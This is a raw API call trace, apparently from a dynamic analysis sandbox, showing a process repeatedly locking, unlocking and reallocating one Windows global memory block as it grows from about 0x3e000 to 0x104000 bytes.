[0107.373] GlobalLock (hMem=0x58000c) returned 0x206810
[0107.374] GlobalHandle (pMem=0x206810) returned 0x58000c
[0107.374] GlobalUnlock (hMem=0x58000c) returned 0
[0107.374] GlobalReAlloc (hMem=0x58000c, dwBytes=0x3e000, uFlags=0x2) returned 0x58000c
[0107.374] GlobalLock (hMem=0x58000c) returned 0x206810
[0107.374] GlobalHandle (pMem=0x206810) returned 0x58000c
[0107.374] GlobalUnlock (hMem=0x58000c) returned 0
[0107.374] GlobalReAlloc (hMem=0x58000c, dwBytes=0x40000, uFlags=0x2) returned 0x58000c
[0107.374] GlobalLock (hMem=0x58000c) returned 0x206810
[0107.375] GlobalHandle (pMem=0x206810) returned 0x58000c
[0107.375] GlobalUnlock (hMem=0x58000c) returned 0
[0107.375] GlobalReAlloc (hMem=0x58000c, dwBytes=0x42000, uFlags=0x2) returned 0x58000c
[0107.375] GlobalLock (hMem=0x58000c) returned 0x206810
[0107.375] GlobalHandle (pMem=0x206810) returned 0x58000c
[0107.375] GlobalUnlock (hMem=0x58000c) returned 0
[0107.375] GlobalReAlloc (hMem=0x58000c, dwBytes=0x44000, uFlags=0x2) returned 0x58000c
[0107.375] GlobalLock (hMem=0x58000c) returned 0x206810
[0107.376] GlobalHandle (pMem=0x206810) returned 0x58000c
[0107.376] GlobalUnlock (hMem=0x58000c) returned 0
[0107.376] GlobalReAlloc (hMem=0x58000c, dwBytes=0x46000, uFlags=0x2) returned 0x58000c
[0107.376] GlobalLock (hMem=0x58000c) returned 0x206810
[0107.376] GlobalHandle (pMem=0x206810) returned 0x58000c
[0107.376] GlobalUnlock (hMem=0x58000c) returned 0
[0107.376] GlobalReAlloc (hMem=0x58000c, dwBytes=0x48000, uFlags=0x2) returned 0x58000c
[0107.376] GlobalLock (hMem=0x58000c) returned 0x206810
[0107.377] GlobalHandle (pMem=0x206810) returned 0x58000c
[0107.377] GlobalUnlock (hMem=0x58000c) returned 0
[0107.377] GlobalReAlloc (hMem=0x58000c, dwBytes=0x4a000, uFlags=0x2) returned 0x58000c
[0107.377] GlobalLock (hMem=0x58000c) returned 0x206810
[0107.377] GlobalHandle (pMem=0x206810) returned 0x58000c
[0107.377] GlobalUnlock (hMem=0x58000c) returned 0
[0107.377] GlobalReAlloc (hMem=0x58000c, dwBytes=0x4c000, uFlags=0x2) returned 0x58000c
[0107.377] GlobalLock (hMem=0x58000c) returned 0x206810
[0107.378] GlobalHandle (pMem=0x206810) returned 0x58000c
[0107.378] GlobalUnlock (hMem=0x58000c) returned 0
[0107.378] GlobalReAlloc (hMem=0x58000c, dwBytes=0x4e000, uFlags=0x2) returned 0x58000c
[0107.378] GlobalLock (hMem=0x58000c) returned 0x206810
[0107.378] GlobalHandle (pMem=0x206810) returned 0x58000c
[0107.378] GlobalUnlock (hMem=0x58000c) returned 0
[0107.378] GlobalReAlloc (hMem=0x58000c, dwBytes=0x50000, uFlags=0x2) returned 0x58000c
[0107.378] GlobalLock (hMem=0x58000c) returned 0x206810
[0107.379] GlobalHandle (pMem=0x206810) returned 0x58000c
[0107.379] GlobalUnlock (hMem=0x58000c) returned 0
[0107.379] GlobalReAlloc (hMem=0x58000c, dwBytes=0x52000, uFlags=0x2) returned 0x58000c
[0107.379] GlobalLock (hMem=0x58000c) returned 0x206810
[0107.379] GlobalHandle (pMem=0x206810) returned 0x58000c
[0107.379] GlobalUnlock (hMem=0x58000c) returned 0
[0107.379] GlobalReAlloc (hMem=0x58000c, dwBytes=0x54000, uFlags=0x2) returned 0x58000c
[0107.379] GlobalLock (hMem=0x58000c) returned 0x206810
[0107.380] GlobalHandle (pMem=0x206810) returned 0x58000c
[0107.380] GlobalUnlock (hMem=0x58000c) returned 0
[0107.380] GlobalReAlloc (hMem=0x58000c, dwBytes=0x56000, uFlags=0x2) returned 0x58000c
[0107.380] GlobalLock (hMem=0x58000c) returned 0x206810
[0107.380] GlobalHandle (pMem=0x206810) returned 0x58000c
[0107.380] GlobalUnlock (hMem=0x58000c) returned 0
[0107.380] GlobalReAlloc (hMem=0x58000c, dwBytes=0x58000, uFlags=0x2) returned 0x58000c
[0107.380] GlobalLock (hMem=0x58000c) returned 0x206810
[0107.381] GlobalHandle (pMem=0x206810) returned 0x58000c
[0107.381] GlobalUnlock (hMem=0x58000c) returned 0
[0107.381] GlobalReAlloc (hMem=0x58000c, dwBytes=0x5a000, uFlags=0x2) returned 0x58000c
[0107.381] GlobalLock (hMem=0x58000c) returned 0x206810
[0107.381] GlobalHandle (pMem=0x206810) returned 0x58000c
[0107.381] GlobalUnlock (hMem=0x58000c) returned 0
[0107.381] GlobalReAlloc (hMem=0x58000c, dwBytes=0x5c000, uFlags=0x2) returned 0x58000c
[0107.381] GlobalLock (hMem=0x58000c) returned 0x206810
[0107.382] GlobalHandle (pMem=0x206810) returned 0x58000c
[0107.382] GlobalUnlock (hMem=0x58000c) returned 0
[0107.382] GlobalReAlloc (hMem=0x58000c, dwBytes=0x5e000, uFlags=0x2) returned 0x58000c
[0107.382] GlobalLock (hMem=0x58000c) returned 0x206810
[0107.382] GlobalHandle (pMem=0x206810) returned 0x58000c
[0107.382] GlobalUnlock (hMem=0x58000c) returned 0
[0107.382] GlobalReAlloc (hMem=0x58000c, dwBytes=0x60000, uFlags=0x2) returned 0x58000c
[0107.382] GlobalLock (hMem=0x58000c) returned 0x206810
[0107.383] GlobalHandle (pMem=0x206810) returned 0x58000c
[0107.383] GlobalUnlock (hMem=0x58000c) returned 0
[0107.383] GlobalReAlloc (hMem=0x58000c, dwBytes=0x62000, uFlags=0x2) returned 0x58000c
[0107.383] GlobalLock (hMem=0x58000c) returned 0x206810
[0107.383] GlobalHandle (pMem=0x206810) returned 0x58000c
[0107.384] GlobalUnlock (hMem=0x58000c) returned 0
[0107.384] GlobalReAlloc (hMem=0x58000c, dwBytes=0x64000, uFlags=0x2) returned 0x58000c
[0107.384] GlobalLock (hMem=0x58000c) returned 0x206810
[0107.384] GlobalHandle (pMem=0x206810) returned 0x58000c
[0107.384] GlobalUnlock (hMem=0x58000c) returned 0
[0107.384] GlobalReAlloc (hMem=0x58000c, dwBytes=0x66000, uFlags=0x2) returned 0x58000c
[0107.384] GlobalLock (hMem=0x58000c) returned 0x206810
[0107.385] GlobalHandle (pMem=0x206810) returned 0x58000c
[0107.385] GlobalUnlock (hMem=0x58000c) returned 0
[0107.385] GlobalReAlloc (hMem=0x58000c, dwBytes=0x68000, uFlags=0x2) returned 0x58000c
[0107.385] GlobalLock (hMem=0x58000c) returned 0x206810
[0107.385] GlobalHandle (pMem=0x206810) returned 0x58000c
[0107.385] GlobalUnlock (hMem=0x58000c) returned 0
[0107.385] GlobalReAlloc (hMem=0x58000c, dwBytes=0x6a000, uFlags=0x2) returned 0x58000c
[0107.385] GlobalLock (hMem=0x58000c) returned 0x206810
[0107.386] GlobalHandle (pMem=0x206810) returned 0x58000c
[0107.386] GlobalUnlock (hMem=0x58000c) returned 0
[0107.386] GlobalReAlloc (hMem=0x58000c, dwBytes=0x6c000, uFlags=0x2) returned 0x58000c
[0107.391] GlobalLock (hMem=0x58000c) returned 0x270820
[0107.392] GlobalHandle (pMem=0x270820) returned 0x58000c
[0107.392] GlobalUnlock (hMem=0x58000c) returned 0
[0107.392] GlobalReAlloc (hMem=0x58000c, dwBytes=0x6e000, uFlags=0x2) returned 0x58000c
[0107.392] GlobalLock (hMem=0x58000c) returned 0x270820
[0107.392] GlobalHandle (pMem=0x270820) returned 0x58000c
[0107.392] GlobalUnlock (hMem=0x58000c) returned 0
[0107.392] GlobalReAlloc (hMem=0x58000c, dwBytes=0x70000, uFlags=0x2) returned 0x58000c
[0107.452] GlobalLock (hMem=0x58000c) returned 0x2520048
[0107.453] GlobalHandle (pMem=0x2520048) returned 0x58000c
[0107.453] GlobalUnlock (hMem=0x58000c) returned 0
[0107.453] GlobalReAlloc (hMem=0x58000c, dwBytes=0x72000, uFlags=0x2) returned 0x58000c
[0107.459] GlobalLock (hMem=0x58000c) returned 0x2590058
[0107.460] GlobalHandle (pMem=0x2590058) returned 0x58000c
[0107.460] GlobalUnlock (hMem=0x58000c) returned 0
[0107.460] GlobalReAlloc (hMem=0x58000c, dwBytes=0x74000, uFlags=0x2) returned 0x58000c
[0107.460] GlobalLock (hMem=0x58000c) returned 0x2590058
[0107.461] GlobalHandle (pMem=0x2590058) returned 0x58000c
[0107.461] GlobalUnlock (hMem=0x58000c) returned 0
[0107.461] GlobalReAlloc (hMem=0x58000c, dwBytes=0x76000, uFlags=0x2) returned 0x58000c
[0107.475] GlobalLock (hMem=0x58000c) returned 0x206810
[0107.475] GlobalHandle (pMem=0x206810) returned 0x58000c
[0107.475] GlobalUnlock (hMem=0x58000c) returned 0
[0107.475] GlobalReAlloc (hMem=0x58000c, dwBytes=0x78000, uFlags=0x2) returned 0x58000c
[0107.482] GlobalLock (hMem=0x58000c) returned 0x2520048
[0107.483] GlobalHandle (pMem=0x2520048) returned 0x58000c
[0107.483] GlobalUnlock (hMem=0x58000c) returned 0
[0107.483] GlobalReAlloc (hMem=0x58000c, dwBytes=0x7a000, uFlags=0x2) returned 0x58000c
[0107.490] GlobalLock (hMem=0x58000c) returned 0x2598058
[0107.491] GlobalHandle (pMem=0x2598058) returned 0x58000c
[0107.491] GlobalUnlock (hMem=0x58000c) returned 0
[0107.491] GlobalReAlloc (hMem=0x58000c, dwBytes=0x7c000, uFlags=0x2) returned 0x58000c
[0107.491] GlobalLock (hMem=0x58000c) returned 0x2598058
[0107.492] GlobalHandle (pMem=0x2598058) returned 0x58000c
[0107.492] GlobalUnlock (hMem=0x58000c) returned 0
[0107.492] GlobalReAlloc (hMem=0x58000c, dwBytes=0x7e000, uFlags=0x2) returned 0x58000c
[0107.554] GlobalLock (hMem=0x58000c) returned 0x2620048
[0107.555] GlobalHandle (pMem=0x2620048) returned 0x58000c
[0107.555] GlobalUnlock (hMem=0x58000c) returned 0
[0107.555] GlobalReAlloc (hMem=0x58000c, dwBytes=0x80000, uFlags=0x2) returned 0x58000c
[0107.619] GlobalLock (hMem=0x58000c) returned 0x800020
[0107.620] GlobalHandle (pMem=0x800020) returned 0x58000c
[0107.620] GlobalUnlock (hMem=0x58000c) returned 0
[0107.620] GlobalReAlloc (hMem=0x58000c, dwBytes=0x82000, uFlags=0x2) returned 0x58000c
[0107.631] GlobalLock (hMem=0x58000c) returned 0x930020
[0107.632] GlobalHandle (pMem=0x930020) returned 0x58000c
[0107.632] GlobalUnlock (hMem=0x58000c) returned 0
[0107.632] GlobalReAlloc (hMem=0x58000c, dwBytes=0x84000, uFlags=0x2) returned 0x58000c
[0107.643] GlobalLock (hMem=0x58000c) returned 0x800020
[0107.644] GlobalHandle (pMem=0x800020) returned 0x58000c
[0107.644] GlobalUnlock (hMem=0x58000c) returned 0
[0107.644] GlobalReAlloc (hMem=0x58000c, dwBytes=0x86000, uFlags=0x2) returned 0x58000c
[0107.656] GlobalLock (hMem=0x58000c) returned 0x930020
[0107.657] GlobalHandle (pMem=0x930020) returned 0x58000c
[0107.657] GlobalUnlock (hMem=0x58000c) returned 0
[0107.657] GlobalReAlloc (hMem=0x58000c, dwBytes=0x88000, uFlags=0x2) returned 0x58000c
[0107.715] GlobalLock (hMem=0x58000c) returned 0x800020
[0107.716] GlobalHandle (pMem=0x800020) returned 0x58000c
[0107.716] GlobalUnlock (hMem=0x58000c) returned 0
[0107.716] GlobalReAlloc (hMem=0x58000c, dwBytes=0x8a000, uFlags=0x2) returned 0x58000c
[0107.727] GlobalLock (hMem=0x58000c) returned 0x930020
[0107.728] GlobalHandle (pMem=0x930020) returned 0x58000c
[0107.728] GlobalUnlock (hMem=0x58000c) returned 0
[0107.728] GlobalReAlloc (hMem=0x58000c, dwBytes=0x8c000, uFlags=0x2) returned 0x58000c
[0107.740] GlobalLock (hMem=0x58000c) returned 0x800020
[0107.741] GlobalHandle (pMem=0x800020) returned 0x58000c
[0107.741] GlobalUnlock (hMem=0x58000c) returned 0
[0107.741] GlobalReAlloc (hMem=0x58000c, dwBytes=0x8e000, uFlags=0x2) returned 0x58000c
[0107.752] GlobalLock (hMem=0x58000c) returned 0x930020
[0107.753] GlobalHandle (pMem=0x930020) returned 0x58000c
[0107.753] GlobalUnlock (hMem=0x58000c) returned 0
[0107.753] GlobalReAlloc (hMem=0x58000c, dwBytes=0x90000, uFlags=0x2) returned 0x58000c
[0107.812] GlobalLock (hMem=0x58000c) returned 0x800020
[0107.813] GlobalHandle (pMem=0x800020) returned 0x58000c
[0107.813] GlobalUnlock (hMem=0x58000c) returned 0
[0107.813] GlobalReAlloc (hMem=0x58000c, dwBytes=0x92000, uFlags=0x2) returned 0x58000c
[0107.825] GlobalLock (hMem=0x58000c) returned 0x930020
[0107.826] GlobalHandle (pMem=0x930020) returned 0x58000c
[0107.826] GlobalUnlock (hMem=0x58000c) returned 0
[0107.826] GlobalReAlloc (hMem=0x58000c, dwBytes=0x94000, uFlags=0x2) returned 0x58000c
[0107.840] GlobalLock (hMem=0x58000c) returned 0x800020
[0107.841] GlobalHandle (pMem=0x800020) returned 0x58000c
[0107.841] GlobalUnlock (hMem=0x58000c) returned 0
[0107.841] GlobalReAlloc (hMem=0x58000c, dwBytes=0x96000, uFlags=0x2) returned 0x58000c
[0107.902] GlobalLock (hMem=0x58000c) returned 0x930020
[0107.903] GlobalHandle (pMem=0x930020) returned 0x58000c
[0107.903] GlobalUnlock (hMem=0x58000c) returned 0
[0107.903] GlobalReAlloc (hMem=0x58000c, dwBytes=0x98000, uFlags=0x2) returned 0x58000c
[0107.915] GlobalLock (hMem=0x58000c) returned 0x800020
[0107.916] GlobalHandle (pMem=0x800020) returned 0x58000c
[0107.916] GlobalUnlock (hMem=0x58000c) returned 0
[0107.916] GlobalReAlloc (hMem=0x58000c, dwBytes=0x9a000, uFlags=0x2) returned 0x58000c
[0107.929] GlobalLock (hMem=0x58000c) returned 0x930020
[0107.930] GlobalHandle (pMem=0x930020) returned 0x58000c
[0107.930] GlobalUnlock (hMem=0x58000c) returned 0
[0107.930] GlobalReAlloc (hMem=0x58000c, dwBytes=0x9c000, uFlags=0x2) returned 0x58000c
[0107.944] GlobalLock (hMem=0x58000c) returned 0x800020
[0107.944] GlobalHandle (pMem=0x800020) returned 0x58000c
[0107.944] GlobalUnlock (hMem=0x58000c) returned 0
[0107.945] GlobalReAlloc (hMem=0x58000c, dwBytes=0x9e000, uFlags=0x2) returned 0x58000c
[0108.005] GlobalLock (hMem=0x58000c) returned 0x930020
[0108.006] GlobalHandle (pMem=0x930020) returned 0x58000c
[0108.006] GlobalUnlock (hMem=0x58000c) returned 0
[0108.006] GlobalReAlloc (hMem=0x58000c, dwBytes=0xa0000, uFlags=0x2) returned 0x58000c
[0108.020] GlobalLock (hMem=0x58000c) returned 0x800020
[0108.020] GlobalHandle (pMem=0x800020) returned 0x58000c
[0108.020] GlobalUnlock (hMem=0x58000c) returned 0
[0108.020] GlobalReAlloc (hMem=0x58000c, dwBytes=0xa2000, uFlags=0x2) returned 0x58000c
[0108.034] GlobalLock (hMem=0x58000c) returned 0x930020
[0108.035] GlobalHandle (pMem=0x930020) returned 0x58000c
[0108.035] GlobalUnlock (hMem=0x58000c) returned 0
[0108.035] GlobalReAlloc (hMem=0x58000c, dwBytes=0xa4000, uFlags=0x2) returned 0x58000c
[0108.095] GlobalLock (hMem=0x58000c) returned 0x800020
[0108.096] GlobalHandle (pMem=0x800020) returned 0x58000c
[0108.096] GlobalUnlock (hMem=0x58000c) returned 0
[0108.096] GlobalReAlloc (hMem=0x58000c, dwBytes=0xa6000, uFlags=0x2) returned 0x58000c
[0108.110] GlobalLock (hMem=0x58000c) returned 0x930020
[0108.111] GlobalHandle (pMem=0x930020) returned 0x58000c
[0108.111] GlobalUnlock (hMem=0x58000c) returned 0
[0108.111] GlobalReAlloc (hMem=0x58000c, dwBytes=0xa8000, uFlags=0x2) returned 0x58000c
[0108.126] GlobalLock (hMem=0x58000c) returned 0x800020
[0108.127] GlobalHandle (pMem=0x800020) returned 0x58000c
[0108.127] GlobalUnlock (hMem=0x58000c) returned 0
[0108.127] GlobalReAlloc (hMem=0x58000c, dwBytes=0xaa000, uFlags=0x2) returned 0x58000c
[0108.188] GlobalLock (hMem=0x58000c) returned 0x930020
[0108.189] GlobalHandle (pMem=0x930020) returned 0x58000c
[0108.189] GlobalUnlock (hMem=0x58000c) returned 0
[0108.189] GlobalReAlloc (hMem=0x58000c, dwBytes=0xac000, uFlags=0x2) returned 0x58000c
[0108.203] GlobalLock (hMem=0x58000c) returned 0x800020
[0108.204] GlobalHandle (pMem=0x800020) returned 0x58000c
[0108.204] GlobalUnlock (hMem=0x58000c) returned 0
[0108.204] GlobalReAlloc (hMem=0x58000c, dwBytes=0xae000, uFlags=0x2) returned 0x58000c
[0108.218] GlobalLock (hMem=0x58000c) returned 0x930020
[0108.219] GlobalHandle (pMem=0x930020) returned 0x58000c
[0108.219] GlobalUnlock (hMem=0x58000c) returned 0
[0108.219] GlobalReAlloc (hMem=0x58000c, dwBytes=0xb0000, uFlags=0x2) returned 0x58000c
[0108.281] GlobalLock (hMem=0x58000c) returned 0x800020
[0108.282] GlobalHandle (pMem=0x800020) returned 0x58000c
[0108.282] GlobalUnlock (hMem=0x58000c) returned 0
[0108.282] GlobalReAlloc (hMem=0x58000c, dwBytes=0xb2000, uFlags=0x2) returned 0x58000c
[0108.297] GlobalLock (hMem=0x58000c) returned 0x930020
[0108.298] GlobalHandle (pMem=0x930020) returned 0x58000c
[0108.298] GlobalUnlock (hMem=0x58000c) returned 0
[0108.298] GlobalReAlloc (hMem=0x58000c, dwBytes=0xb4000, uFlags=0x2) returned 0x58000c
[0108.313] GlobalLock (hMem=0x58000c) returned 0x800020
[0108.314] GlobalHandle (pMem=0x800020) returned 0x58000c
[0108.314] GlobalUnlock (hMem=0x58000c) returned 0
[0108.314] GlobalReAlloc (hMem=0x58000c, dwBytes=0xb6000, uFlags=0x2) returned 0x58000c
[0108.375] GlobalLock (hMem=0x58000c) returned 0x930020
[0108.376] GlobalHandle (pMem=0x930020) returned 0x58000c
[0108.376] GlobalUnlock (hMem=0x58000c) returned 0
[0108.376] GlobalReAlloc (hMem=0x58000c, dwBytes=0xb8000, uFlags=0x2) returned 0x58000c
[0108.392] GlobalLock (hMem=0x58000c) returned 0x800020
[0108.393] GlobalHandle (pMem=0x800020) returned 0x58000c
[0108.393] GlobalUnlock (hMem=0x58000c) returned 0
[0108.393] GlobalReAlloc (hMem=0x58000c, dwBytes=0xba000, uFlags=0x2) returned 0x58000c
[0108.409] GlobalLock (hMem=0x58000c) returned 0x930020
[0108.410] GlobalHandle (pMem=0x930020) returned 0x58000c
[0108.410] GlobalUnlock (hMem=0x58000c) returned 0
[0108.410] GlobalReAlloc (hMem=0x58000c, dwBytes=0xbc000, uFlags=0x2) returned 0x58000c
[0108.473] GlobalLock (hMem=0x58000c) returned 0x800020
[0108.474] GlobalHandle (pMem=0x800020) returned 0x58000c
[0108.474] GlobalUnlock (hMem=0x58000c) returned 0
[0108.474] GlobalReAlloc (hMem=0x58000c, dwBytes=0xbe000, uFlags=0x2) returned 0x58000c
[0108.491] GlobalLock (hMem=0x58000c) returned 0x930020
[0108.492] GlobalHandle (pMem=0x930020) returned 0x58000c
[0108.492] GlobalUnlock (hMem=0x58000c) returned 0
[0108.492] GlobalReAlloc (hMem=0x58000c, dwBytes=0xc0000, uFlags=0x2) returned 0x58000c
[0108.554] GlobalLock (hMem=0x58000c) returned 0x800020
[0108.555] GlobalHandle (pMem=0x800020) returned 0x58000c
[0108.555] GlobalUnlock (hMem=0x58000c) returned 0
[0108.555] GlobalReAlloc (hMem=0x58000c, dwBytes=0xc2000, uFlags=0x2) returned 0x58000c
[0108.572] GlobalLock (hMem=0x58000c) returned 0x930020
[0108.573] GlobalHandle (pMem=0x930020) returned 0x58000c
[0108.573] GlobalUnlock (hMem=0x58000c) returned 0
[0108.573] GlobalReAlloc (hMem=0x58000c, dwBytes=0xc4000, uFlags=0x2) returned 0x58000c
[0108.589] GlobalLock (hMem=0x58000c) returned 0x800020
[0108.590] GlobalHandle (pMem=0x800020) returned 0x58000c
[0108.590] GlobalUnlock (hMem=0x58000c) returned 0
[0108.590] GlobalReAlloc (hMem=0x58000c, dwBytes=0xc6000, uFlags=0x2) returned 0x58000c
[0108.655] GlobalLock (hMem=0x58000c) returned 0x930020
[0108.656] GlobalHandle (pMem=0x930020) returned 0x58000c
[0108.656] GlobalUnlock (hMem=0x58000c) returned 0
[0108.656] GlobalReAlloc (hMem=0x58000c, dwBytes=0xc8000, uFlags=0x2) returned 0x58000c
[0108.676] GlobalLock (hMem=0x58000c) returned 0x800020
[0108.677] GlobalHandle (pMem=0x800020) returned 0x58000c
[0108.677] GlobalUnlock (hMem=0x58000c) returned 0
[0108.677] GlobalReAlloc (hMem=0x58000c, dwBytes=0xca000, uFlags=0x2) returned 0x58000c
[0108.744] GlobalLock (hMem=0x58000c) returned 0x930020
[0108.745] GlobalHandle (pMem=0x930020) returned 0x58000c
[0108.746] GlobalUnlock (hMem=0x58000c) returned 0
[0108.746] GlobalReAlloc (hMem=0x58000c, dwBytes=0xcc000, uFlags=0x2) returned 0x58000c
[0108.767] GlobalLock (hMem=0x58000c) returned 0x800020
[0108.768] GlobalHandle (pMem=0x800020) returned 0x58000c
[0108.768] GlobalUnlock (hMem=0x58000c) returned 0
[0108.768] GlobalReAlloc (hMem=0x58000c, dwBytes=0xce000, uFlags=0x2) returned 0x58000c
[0108.851] GlobalLock (hMem=0x58000c) returned 0x930020
[0108.852] GlobalHandle (pMem=0x930020) returned 0x58000c
[0108.852] GlobalUnlock (hMem=0x58000c) returned 0
[0108.852] GlobalReAlloc (hMem=0x58000c, dwBytes=0xd0000, uFlags=0x2) returned 0x58000c
[0108.870] GlobalLock (hMem=0x58000c) returned 0x800020
[0108.871] GlobalHandle (pMem=0x800020) returned 0x58000c
[0108.871] GlobalUnlock (hMem=0x58000c) returned 0
[0108.871] GlobalReAlloc (hMem=0x58000c, dwBytes=0xd2000, uFlags=0x2) returned 0x58000c
[0108.890] GlobalLock (hMem=0x58000c) returned 0x2820020
[0108.891] GlobalHandle (pMem=0x2820020) returned 0x58000c
[0108.891] GlobalUnlock (hMem=0x58000c) returned 0
[0108.891] GlobalReAlloc (hMem=0x58000c, dwBytes=0xd4000, uFlags=0x2) returned 0x58000c
[0108.956] GlobalLock (hMem=0x58000c) returned 0x800020
[0108.957] GlobalHandle (pMem=0x800020) returned 0x58000c
[0108.957] GlobalUnlock (hMem=0x58000c) returned 0
[0108.957] GlobalReAlloc (hMem=0x58000c, dwBytes=0xd6000, uFlags=0x2) returned 0x58000c
[0108.977] GlobalLock (hMem=0x58000c) returned 0x2820020
[0108.977] GlobalHandle (pMem=0x2820020) returned 0x58000c
[0108.977] GlobalUnlock (hMem=0x58000c) returned 0
[0108.978] GlobalReAlloc (hMem=0x58000c, dwBytes=0xd8000, uFlags=0x2) returned 0x58000c
[0109.042] GlobalLock (hMem=0x58000c) returned 0x800020
[0109.043] GlobalHandle (pMem=0x800020) returned 0x58000c
[0109.043] GlobalUnlock (hMem=0x58000c) returned 0
[0109.043] GlobalReAlloc (hMem=0x58000c, dwBytes=0xda000, uFlags=0x2) returned 0x58000c
[0109.061] GlobalLock (hMem=0x58000c) returned 0x2820020
[0109.062] GlobalHandle (pMem=0x2820020) returned 0x58000c
[0109.062] GlobalUnlock (hMem=0x58000c) returned 0
[0109.062] GlobalReAlloc (hMem=0x58000c, dwBytes=0xdc000, uFlags=0x2) returned 0x58000c
[0109.080] GlobalLock (hMem=0x58000c) returned 0x800020
[0109.081] GlobalHandle (pMem=0x800020) returned 0x58000c
[0109.081] GlobalUnlock (hMem=0x58000c) returned 0
[0109.081] GlobalReAlloc (hMem=0x58000c, dwBytes=0xde000, uFlags=0x2) returned 0x58000c
[0109.146] GlobalLock (hMem=0x58000c) returned 0x2820020
[0109.147] GlobalHandle (pMem=0x2820020) returned 0x58000c
[0109.147] GlobalUnlock (hMem=0x58000c) returned 0
[0109.147] GlobalReAlloc (hMem=0x58000c, dwBytes=0xe0000, uFlags=0x2) returned 0x58000c
[0109.166] GlobalLock (hMem=0x58000c) returned 0x800020
[0109.167] GlobalHandle (pMem=0x800020) returned 0x58000c
[0109.167] GlobalUnlock (hMem=0x58000c) returned 0
[0109.167] GlobalReAlloc (hMem=0x58000c, dwBytes=0xe2000, uFlags=0x2) returned 0x58000c
[0109.233] GlobalLock (hMem=0x58000c) returned 0x2820020
[0109.234] GlobalHandle (pMem=0x2820020) returned 0x58000c
[0109.234] GlobalUnlock (hMem=0x58000c) returned 0
[0109.234] GlobalReAlloc (hMem=0x58000c, dwBytes=0xe4000, uFlags=0x2) returned 0x58000c
[0109.257] GlobalLock (hMem=0x58000c) returned 0x800020
[0109.258] GlobalHandle (pMem=0x800020) returned 0x58000c
[0109.258] GlobalUnlock (hMem=0x58000c) returned 0
[0109.258] GlobalReAlloc (hMem=0x58000c, dwBytes=0xe6000, uFlags=0x2) returned 0x58000c
[0109.327] GlobalLock (hMem=0x58000c) returned 0x2820020
[0109.328] GlobalHandle (pMem=0x2820020) returned 0x58000c
[0109.328] GlobalUnlock (hMem=0x58000c) returned 0
[0109.328] GlobalReAlloc (hMem=0x58000c, dwBytes=0xe8000, uFlags=0x2) returned 0x58000c
[0109.347] GlobalLock (hMem=0x58000c) returned 0x800020
[0109.348] GlobalHandle (pMem=0x800020) returned 0x58000c
[0109.348] GlobalUnlock (hMem=0x58000c) returned 0
[0109.348] GlobalReAlloc (hMem=0x58000c, dwBytes=0xea000, uFlags=0x2) returned 0x58000c
[0109.415] GlobalLock (hMem=0x58000c) returned 0x2820020
[0109.416] GlobalHandle (pMem=0x2820020) returned 0x58000c
[0109.416] GlobalUnlock (hMem=0x58000c) returned 0
[0109.416] GlobalReAlloc (hMem=0x58000c, dwBytes=0xec000, uFlags=0x2) returned 0x58000c
[0109.435] GlobalLock (hMem=0x58000c) returned 0x800020
[0109.436] GlobalHandle (pMem=0x800020) returned 0x58000c
[0109.436] GlobalUnlock (hMem=0x58000c) returned 0
[0109.436] GlobalReAlloc (hMem=0x58000c, dwBytes=0xee000, uFlags=0x2) returned 0x58000c
[0109.455] GlobalLock (hMem=0x58000c) returned 0x2820020
[0109.456] GlobalHandle (pMem=0x2820020) returned 0x58000c
[0109.456] GlobalUnlock (hMem=0x58000c) returned 0
[0109.456] GlobalReAlloc (hMem=0x58000c, dwBytes=0xf0000, uFlags=0x2) returned 0x58000c
[0109.526] GlobalLock (hMem=0x58000c) returned 0x2910020
[0109.528] GlobalHandle (pMem=0x2910020) returned 0x58000c
[0109.528] GlobalUnlock (hMem=0x58000c) returned 0
[0109.528] GlobalReAlloc (hMem=0x58000c, dwBytes=0xf2000, uFlags=0x2) returned 0x58000c
[0109.552] GlobalLock (hMem=0x58000c) returned 0x2a10020
[0109.600] GlobalHandle (pMem=0x2a10020) returned 0x58000c
[0109.600] GlobalUnlock (hMem=0x58000c) returned 0
[0109.600] GlobalReAlloc (hMem=0x58000c, dwBytes=0xf4000, uFlags=0x2) returned 0x58000c
[0109.622] GlobalLock (hMem=0x58000c) returned 0x2820020
[0109.623] GlobalHandle (pMem=0x2820020) returned 0x58000c
[0109.623] GlobalUnlock (hMem=0x58000c) returned 0
[0109.623] GlobalReAlloc (hMem=0x58000c, dwBytes=0xf6000, uFlags=0x2) returned 0x58000c
[0109.643] GlobalLock (hMem=0x58000c) returned 0x2920020
[0109.644] GlobalHandle (pMem=0x2920020) returned 0x58000c
[0109.644] GlobalUnlock (hMem=0x58000c) returned 0
[0109.644] GlobalReAlloc (hMem=0x58000c, dwBytes=0xf8000, uFlags=0x2) returned 0x58000c
[0109.712] GlobalLock (hMem=0x58000c) returned 0x2820020
[0109.713] GlobalHandle (pMem=0x2820020) returned 0x58000c
[0109.713] GlobalUnlock (hMem=0x58000c) returned 0
[0109.713] GlobalReAlloc (hMem=0x58000c, dwBytes=0xfa000, uFlags=0x2) returned 0x58000c
[0109.733] GlobalLock (hMem=0x58000c) returned 0x2920020
[0109.734] GlobalHandle (pMem=0x2920020) returned 0x58000c
[0109.734] GlobalUnlock (hMem=0x58000c) returned 0
[0109.734] GlobalReAlloc (hMem=0x58000c, dwBytes=0xfc000, uFlags=0x2) returned 0x58000c
[0109.801] GlobalLock (hMem=0x58000c) returned 0x2820020
[0109.802] GlobalHandle (pMem=0x2820020) returned 0x58000c
[0109.802] GlobalUnlock (hMem=0x58000c) returned 0
[0109.802] GlobalReAlloc (hMem=0x58000c, dwBytes=0xfe000, uFlags=0x2) returned 0x58000c
[0109.824] GlobalLock (hMem=0x58000c) returned 0x2920020
[0109.824] GlobalHandle (pMem=0x2920020) returned 0x58000c
[0109.824] GlobalUnlock (hMem=0x58000c) returned 0
[0109.824] GlobalReAlloc (hMem=0x58000c, dwBytes=0x100000, uFlags=0x2) returned 0x58000c
[0109.892] GlobalLock (hMem=0x58000c) returned 0x2a20020
[0109.893] GlobalHandle (pMem=0x2a20020) returned 0x58000c
[0109.893] GlobalUnlock (hMem=0x58000c) returned 0
[0109.893] GlobalReAlloc (hMem=0x58000c, dwBytes=0x102000, uFlags=0x2) returned 0x58000c
[0109.914] GlobalLock (hMem=0x58000c) returned 0x2820020
[0109.915] GlobalHandle (pMem=0x2820020) returned 0x58000c
[0109.915] GlobalUnlock (hMem=0x58000c) returned 0
[0109.915] GlobalReAlloc (hMem=0x58000c, dwBytes=0x104000, uFlags=0x2) returned 0x58000c
[0109.983] GlobalLock (hMem=0x58000c) returned 0x2930020
[0109.984] GlobalHandle (pMem=0x2930020) returned 0x58000c
